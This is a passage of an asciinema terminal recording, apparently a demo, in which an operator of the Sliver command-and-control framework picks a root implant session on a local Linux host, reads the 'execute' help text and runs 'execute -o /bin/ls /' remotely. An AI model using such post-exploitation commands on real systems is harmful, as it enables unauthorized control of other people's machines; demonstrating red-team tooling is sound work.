"\u001b[1A\u001b[9D\u001b[9C\u001b[107D\u001b[9C\u001b[?25h"] +[7.953828, "o", "\u001b[?25l\u001b[107D"] +[7.955531, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[7.963749, "o", "u\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[10D"] +[7.964016, "o", "\u001b[9C\u001b[107D\u001b[10C\u001b[?25h"] +[8.029707, "o", "\u001b[?25l\u001b[107D"] +[8.036125, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[8.039629, "o", "us\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[11D\u001b[9C\u001b[107D\u001b[11C\u001b[?25h"] +[8.094035, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[8.10045, "o", "\u001b[1m\u001b[32muse\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[12D\u001b[9C\u001b[107D\u001b[12C\u001b[?25h"] +[8.398557, "o", "\u001b[12D\u001b[9C\u001b[6n"] +[8.399508, "o", "\u001b[107D\u001b[12C"] +[8.399706, "o", "\u001b[0J\u001b[107D\r\r\n"] +[8.402185, "o", "\u001b[0 q\r\n"] +[8.429132, "o", "\u001b7\u001b[?25l"] +[8.429794, "o", "\u001b8"] +[8.430496, "o", "\u001b[0G\u001b[2K"] +[8.441592, "o", "\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mSelect a session or beacon:\u001b[0m \u001b[0;36m[Use arrows to move, type to filter]\u001b[0m\r\n\u001b[0;1;36m> SESSION e1bcdc51 CURRENT_RESIST 127.0.0.1:59370 98df0494f659 root linux/amd64\u001b[0m\r\n\u001b7"] +[8.44459, "o", "\u001b[1A\u001b[0G"] +[9.251683, "o", "\u001b8\u001b[?25h\u001b8"] +[9.255016, "o", "\u001b[0G\u001b[2K\u001b[1A\u001b[0G"] +[9.256809, "o", "\u001b[2K\u001b[1A\u001b[0G\u001b[2K"] +[9.258119, "o", "\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mSelect a session or beacon:\u001b[0m\u001b[0;36m SESSION e1bcdc51 CURRENT_RESIST 127.0.0.1:59370 98df0494f659 root linux/amd64\u001b[0m"] +[9.260355, "o", "\r\n"] +[9.272535, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mActive session CURRENT_RESIST (e1bcdc51-51db-461f-964e-3e9aa6727b09)\r\n"] +[9.308304, "o", "\r\n"] +[9.320355, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[9.320659, "o", "\u001b[1 q"] +[9.321354, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[9.323351, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[9.323863, "o", "\u001b[0J\u001b[107D\u001b[1A\u001b[26D\u001b[26C\u001b[107D\u001b[26C\u001b[?25h"] +[11.646644, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[11.654024, "o", "e\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[27D\u001b[26C\u001b[107D\u001b[27C\u001b[?25h"] +[11.875207, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[11.881933, "o", "ex\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[11.882199, "o", "\u001b[107D\u001b[1A\u001b[28D\u001b[26C\u001b[107D\u001b[28C\u001b[?25h"] +[12.020674, "o", "\u001b[?25l\u001b[107D"] +[12.027967, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[12.03527, "o", "exe\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[29D\u001b[26C\u001b[107D\u001b[29C\u001b[?25h"] +[12.162061, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[12.163295, "o", "\u001b[6n"] +[12.16671, "o", "exec\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[30D\u001b[26C\u001b[107D\u001b[30C\u001b[?25h"] +[12.378537, "o", "\u001b[?25l"] +[12.382289, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[12.389835, "o", "execu\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[31D\u001b[26C\u001b[107D\u001b[31C\u001b[?25h"] +[12.643075, "o", "\u001b[?25l\u001b[107D"] +[12.643948, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[12.650862, "o", "execut\u001b[0m\u001b[0K\u001b[49m\r"] +[12.651194, "o", "\r\n\u001b[0K"] +[12.653557, "o", "\u001b[0J\u001b[107D\u001b[1A\u001b[32D\u001b[26C\u001b[107D\u001b[32C\u001b[?25h"] +[12.768298, "o", "\u001b[?25l\u001b[107D"] +[12.769352, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[12.774698, "o", "\u001b[1m\u001b[32mexecute\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D"] +[12.775133, "o", "\u001b[1A\u001b[33D\u001b[26C\u001b[107D\u001b[33C\u001b[?25h"] +[12.866691, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[12.874603, "o", "\u001b[1m\u001b[32mexecute \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[12.875518, "o", "\u001b[0J\u001b[107D\u001b[1A\u001b[34D\u001b[26C\u001b[107D\u001b[34C\u001b[?25h"] +[13.114144, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[13.116795, "o", "\u001b[1m\u001b[32mexecute \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[35D\u001b[26C\u001b[107D"] +[13.116894, "o", "\u001b[35C\u001b[?25h"] +[13.372747, "o", "\u001b[?25l"] +[13.374034, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[13.375235, "o", "\u001b[6n"] +[13.378893, "o", "\u001b[1m\u001b[32mexecute \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-h\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D"] +[13.37985, "o", "\u001b[1A\u001b[36D\u001b[26C\u001b[107D\u001b[36C\u001b[?25h"] +[13.542691, "o", "\u001b[36D"] +[13.545253, "o", "\u001b[26C\u001b[6n"] +[13.553702, "o", "\u001b[107D\u001b[36C\u001b[0J\u001b[107D\r\r\n\u001b[0 q\r\n"] +[13.560905, "o", "Execute a program on the remote system\r\n\r\n"] +[13.569592, "o", "Usage:\r\n execute [flags]\r\n\r\nFlags:\r\n -h, --help help for execute\r\n -H, --hidden hide the window of the spawned process (Windows only)\r\n -S, --ignore-stderr don't print STDERR output\r\n -X, --loot save output as loot\r\n -n, --name string name to assign loot (optional)\r\n -o, --output capture command output\r\n -P, --ppid uint32 parent process id (optional, Windows only)\r\n -s, --save save output to a file\r\n -E, --stderr string remote path to redirect STDERR to\r\n -O, --stdout string remote path to redirect STDOUT to\r\n -t, --timeout int grpc timeout in seconds (default 60)\r\n -T, --token execute command with current token (Windows only)\r\n\r\n"] +[13.584792, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[13.58496, "o", "\u001b[1 q\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[13.587259, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[26D\u001b[26C\u001b[107D\u001b[26C\u001b[?25h"] +[14.037364, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[14.044114, "o", "e\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[27D\u001b[26C\u001b[107D\u001b[27C\u001b[?25h"] +[14.199683, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[14.21306, "o", "ex\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[14.214847, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[28D\u001b[26C\u001b[107D\u001b[28C\u001b[?25h"] +[14.357009, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[14.367702, "o", "exe\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[29D\u001b[26C\u001b[107D\u001b[29C\u001b[?25h"] +[14.897845, "o", "\u001b[?25l"] +[14.901927, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[14.910301, "o", "exet\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[14.910969, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[30D\u001b[26C\u001b[107D\u001b[30C\u001b[?25h"] +[15.391278, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[15.400703, "o", "exe\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[29D\u001b[26C\u001b[107D\u001b[29C\u001b[?25h"] +[15.471799, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[15.479711, "o", "exec\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[15.480898, "o", "\u001b[107D\u001b[1A\u001b[30D\u001b[26C\u001b[107D\u001b[30C\u001b[?25h"] +[15.614302, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[15.624158, "o", "execu\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[15.624912, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[31D\u001b[26C\u001b[107D\u001b[31C\u001b[?25h"] +[15.782521, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[15.793945, "o", "execut\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[32D\u001b[26C\u001b[107D\u001b[32C\u001b[?25h"] +[15.86119, "o", "\u001b[?25l\u001b[107D"] +[15.861475, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[15.863091, "o", "\u001b[1m\u001b[32mexecute\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[33D\u001b[26C\u001b[107D\u001b[33C\u001b[?25h"] +[15.987734, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[15.994851, "o", "\u001b[1m\u001b[32mexecute \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[15.995181, "o", "\u001b[0J\u001b[107D\u001b[1A\u001b[34D\u001b[26C\u001b[107D\u001b[34C\u001b[?25h"] +[19.67185, "o", "\u001b[?25l\u001b[107D"] +[19.673708, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[19.681421, "o", "\u001b[1m\u001b[32mexecute \u001b[39m\u001b[22m/\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[19.682207, "o", "\u001b[107D\u001b[1A\u001b[35D\u001b[26C\u001b[107D\u001b[35C\u001b[?25h"] +[20.019092, "o", "\u001b[?25l"] +[20.025375, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[20.031291, "o", "\u001b[1m\u001b[32mexecute \u001b[39m\u001b[22m/b\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[36D\u001b[26C\u001b[107D\u001b[36C"] +[20.033038, "o", "\u001b[?25h"] +[20.154414, "o", "\u001b[?25l\u001b[107D"] +[20.154819, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[20.157803, "o", "\u001b[1m\u001b[32mexecute \u001b[39m\u001b[22m/bi\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[37D\u001b[26C\u001b[107D\u001b[37C\u001b[?25h"] +[20.269444, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[20.278759, "o", "\u001b[1m\u001b[32mexecute \u001b[39m\u001b[22m/bin\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[38D\u001b[26C\u001b[107D\u001b[38C\u001b[?25h"] +[21.306856, "o", "\u001b[?25l"] +[21.315414, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[21.3218, "o", "\u001b[1m\u001b[32mexecute \u001b[39m\u001b[22m/bin/\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[39D\u001b[26C\u001b[107D\u001b[39C\u001b[?25h"] +[21.693634, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[21.69433, "o", "\u001b[6n"] +[21.701285, "o", "\u001b[1m\u001b[32mexecute \u001b[39m\u001b[22m/bin/l\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[21.702159, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[40D\u001b[26C\u001b[107D\u001b[40C\u001b[?25h"] +[21.827077, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[21.838425, "o", "\u001b[1m\u001b[32mexecute \u001b[39m\u001b[22m/bin/ls\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[21.839936, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[41D\u001b[26C\u001b[107D\u001b[41C\u001b[?25h"] +[21.969341, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[21.979181, "o", "\u001b[1m\u001b[32mexecute \u001b[39m\u001b[22m/bin/ls \u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[42D\u001b[26C\u001b[107D\u001b[42C\u001b[?25h"] +[23.201983, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[23.21476, "o", "\u001b[1m\u001b[32mexecute \u001b[39m\u001b[22m/bin/ls \u001b[1m\u001b[38;05;244m-\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[23.216263, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[43D\u001b[26C\u001b[107D\u001b[43C\u001b[?25h"] +[25.596733, "o", "\u001b[?25l"] +[25.603213, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[25.610827, "o", "\u001b[1m\u001b[32mexecute \u001b[39m\u001b[22m/bin/ls \u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[42D\u001b[26C\u001b[107D\u001b[42C\u001b[?25h"] +[26.044156, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[26.057831, "o", "\u001b[1m\u001b[32mexecute \u001b[39m\u001b[22m/bin/ls /\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[26.05881, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[43D\u001b[26C\u001b[107D\u001b[43C\u001b[?25h"] +[26.261951, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[26.271709, "o", "\u001b[6n"] +[26.276731, "o", "\u001b[1m\u001b[32mexecute \u001b[39m\u001b[22m/bin/ls / \u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[26.278469, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[44D\u001b[26C\u001b[107D\u001b[44C\u001b[?25h"] +[27.20039, "o", "\u001b[?25l"] +[27.202463, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[27.208184, "o", "\u001b[1m\u001b[32mexecute \u001b[39m\u001b[22m/bin/ls / \u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[27.208868, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[43D\u001b[26C\u001b[107D\u001b[43C\u001b[?25h"] +[27.702218, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[27.709463, "o", "\u001b[1m\u001b[32mexecute \u001b[39m\u001b[22m/bin/ls / \u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[42D\u001b[26C\u001b[107D\u001b[42C\u001b[?25h"] +[27.780314, "o", "\u001b[?25l"] +[27.782576, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[27.785904, "o", "\u001b[1m\u001b[32mexecute \u001b[39m\u001b[22m/bin/ls / \u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[27.786407, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[41D\u001b[26C\u001b[107D\u001b[41C\u001b[?25h"] +[27.849841, "o", "\u001b[?25l\u001b[107D"] +[27.849996, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[27.85177, "o", "\u001b[1m\u001b[32mexecute \u001b[39m\u001b[22m/bin/ls / \u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A"] +[27.852613, "o", "\u001b[40D\u001b[26C\u001b[107D\u001b[40C\u001b[?25h"] +[27.934263, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[27.935215, "o", "\u001b[6n"] +[27.937815, "o", "\u001b[1m\u001b[32mexecute \u001b[39m\u001b[22m/bin/ls / \u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[39D"] +[27.938416, "o", "\u001b[26C\u001b[107D\u001b[39C\u001b[?25h"] +[28.018712, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[28.018874, "o", "\u001b[6n"] +[28.02151, "o", "\u001b[1m\u001b[32mexecute \u001b[39m\u001b[22m/bin/ls / \u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[38D\u001b[26C\u001b[107D\u001b[38C\u001b[?25h"] +[28.10701, "o", "\u001b[?25l\u001b[107D"] +[28.108399, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[28.111275, "o", "\u001b[1m\u001b[32mexecute \u001b[39m\u001b[22m/bin/ls / \u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[37D\u001b[26C\u001b[107D\u001b[37C"] +[28.112338, "o", "\u001b[?25h"] +[28.196484, "o", "\u001b[?25l"] +[28.198715, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[28.203237, "o", "\u001b[1m\u001b[32mexecute \u001b[39m\u001b[22m/bin/ls / \u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[28.203907, "o", "\u001b[107D\u001b[1A\u001b[36D\u001b[26C\u001b[107D\u001b[36C\u001b[?25h"] +[28.277332, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[28.282855, "o", "\u001b[1m\u001b[32mexecute \u001b[39m\u001b[22m/bin/ls / \u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[35D\u001b[26C\u001b[107D\u001b[35C\u001b[?25h"] +[28.533288, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[28.542459, "o", "\u001b[1m\u001b[32mexecute \u001b[39m\u001b[22m/bin/ls / \u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[28.543746, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[34D\u001b[26C\u001b[107D\u001b[34C\u001b[?25h"] +[28.868304, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[28.869173, "o", "\u001b[6n"] +[28.880099, "o", "\u001b[1m\u001b[32mexecute \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-/bin/ls \u001b[39m\u001b[22m/ \u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[28.880738, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[35D\u001b[26C\u001b[107D\u001b[35C\u001b[?25h"] +[29.19404, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[29.197355, "o", "\u001b[6n"] +[29.20746, "o", "\u001b[1m\u001b[32mexecute \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-o/bin/ls \u001b[39m\u001b[22m/ \u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[29.208826, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[36D\u001b[26C\u001b[107D\u001b[36C\u001b[?25h"] +[29.303177, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[29.303346, "o", "\u001b[6n"] +[29.30501, "o", "\u001b[1m\u001b[32mexecute \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-o \u001b[39m\u001b[22m/bin/ls / \u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D"] +[29.305658, "o", "\u001b[1A\u001b[37D\u001b[26C\u001b[107D\u001b[37C\u001b[?25h"] +[32.966801, "o", "\u001b[37D\u001b[26C"] +[32.967745, "o", "\u001b[6n"] +[32.978194, "o", "\u001b[107D\u001b[47C\u001b[0J\u001b[107D\r\r\n"] +[32.979946, "o", "\u001b[0 q\r\n"] +[33.098088, "o", "\r\u001b[2K ⠋ Executing /bin/ls / ..."] +[33.118263, "o", "\r\u001b[2K"] +[33.11911, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mOutput:\r\nbin\r\nboot\r\ndev\r\netc\r\nhome\r\nlib\r\nlib32\r\nlib64\r\nlibx32\r\nmedia\r\nmnt\r\nopt\r\nproc\r\nroot\r\nrun\r\nsbin\r\nsrv\r\nsys\r\ntmp\r\nusr\r\nvar\r\n\r\n"] +[33.136833, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[33.137974, "o", "\u001b[1 q"] +[33.13849, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[33.141693, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[33.142394, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[26D\u001b[26C\u001b[107D\u001b[26C\u001b[?25h"] +[37.352368, "o", "\u001b[?25l\u001b[107D"] +[37.353087, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[37.354717, "o", "e\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[37.355127, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[27D\u001b[26C\u001b[107D\u001b[27C\u001b[?25h"] +[37.582877, "o", "\u001b[?25l"] +[37.585677, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[37.595738, "o", "ex\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[37.596715, "o", "\u001b[107D\u001b[1A\u001b[28D\u001b[26C\u001b[107D\u001b[28C\u001b[?25h"] +[38.549862, "o", "\u001b[?25l"] +[38.552822, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[38.56645, "o", "e\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[27D\u001b[26C\u001b[107D\u001b[27C\u001b[?25h"] +[38.690797, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[38.69985, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[38.702217, "o", "\u001b[107D\u001b[1A\u001b[26D\u001b[26C\u001b[107D\u001b[26C\u001b[?25h"] +[38.907656, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[38.920832, "o", 